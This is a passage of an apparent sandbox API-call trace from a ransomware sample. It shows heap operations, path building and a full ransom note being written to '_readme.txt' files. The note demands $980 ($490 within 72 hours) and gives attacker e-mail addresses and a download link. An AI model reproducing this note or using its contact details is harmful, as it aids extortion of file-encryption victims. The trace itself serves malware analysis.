hHeap=0xcd0000) returned 1 [0165.676] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.676] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.676] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.676] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.676] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.676] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.676] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.676] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.676] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.676] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.676] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.676] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.676] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.676] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.677] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.677] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.677] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b40090 [0165.677] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.677] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.677] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.677] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.677] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.677] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.677] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.677] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.677] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.677] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.677] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.677] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.677] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.677] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.677] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.677] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.677] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.677] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.677] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.677] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.677] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.677] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.677] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.677] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.677] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.677] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.677] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.677] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.677] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.677] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.677] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.677] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.677] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.677] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.677] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.678] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.678] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.678] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.678] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.678] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.678] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.678] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.678] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.678] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.678] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.678] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.678] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.678] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.678] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.678] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.678] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.678] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.678] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.678] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.678] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.678] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.678] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.678] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.678] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.678] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.678] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.678] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.678] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.678] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.678] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.678] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.678] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.678] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.678] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.678] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.678] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.678] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.679] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.679] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.679] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.679] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.679] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.679] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.679] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.679] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.679] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.679] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.679] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.679] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.679] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.679] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.679] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.679] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.679] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.679] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.679] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.679] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.679] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.679] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.679] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.679] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.679] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.679] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.679] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.679] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.679] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.679] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.679] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.680] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.680] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.680] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.680] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.680] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.680] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.680] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.680] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.680] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.680] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.680] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.680] PathFindFileNameW (pszPath="C:\\Boot\\nb-NO\\") returned="nb-NO\\" [0165.680] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0165.680] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.680] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0165.680] PathFindFileNameW (pszPath="") returned="" [0165.680] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0165.681] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0165.681] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b40090 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0165.681] FreeLibrary (hLibModule=0x759d0000) returned 1 [0165.681] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.681] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.681] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.681] PathAppendW (in: pszPath="C:\\Boot\\nb-NO\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\nb-NO\\_readme.txt") returned 1 [0165.681] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.681] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.681] PathFileExistsW (pszPath="C:\\Boot\\nb-NO\\_readme.txt") returned 0 [0165.681] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x7d00) returned 0x3b44e70 [0165.681] lstrcpyW (in: lpString1=0x3b44e70, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" [0165.681] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde", lpString2="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" [0165.681] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b1a750 [0165.681] CreateFileW (lpFileName="C:\\Boot\\nb-NO\\_readme.txt" (normalized: "c:\\boot\\nb-no\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0165.682] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b1a750 | out: hHeap=0xcd0000) returned 1 [0165.682] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44e70 | out: hHeap=0xcd0000) returned 1 [0165.682] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.682] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.682] FindFirstFileW (in: lpFileName="C:\\Boot\\nb-NO\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0165.682] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.682] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0165.682] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea212efb, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15850, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0165.682] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea212efb, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15850, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0165.682] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0165.682] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.682] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c200 | out: hHeap=0xcd0000) returned 1 [0165.682] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c200 [0165.682] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.682] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.682] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.682] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.682] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.683] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.683] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.683] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.683] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.683] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.683] RtlAllocateHeap 